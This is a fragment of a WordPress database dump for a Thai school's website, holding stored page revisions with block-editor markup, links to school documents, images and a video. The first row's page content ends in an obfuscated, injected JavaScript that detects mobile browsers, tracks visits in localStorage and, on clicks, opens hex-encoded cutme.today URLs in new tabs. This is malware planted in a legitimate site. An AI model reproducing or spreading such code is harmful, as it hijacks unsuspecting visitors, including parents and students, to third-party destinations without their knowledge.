'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 14:24:01','2024-08-29 07:24:01','',19,'http://watprato.ssk.in.th/?p=268',0,'revision','',0),
(269,2,'2024-08-29 14:25:23','2024-08-29 07:25:23','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div 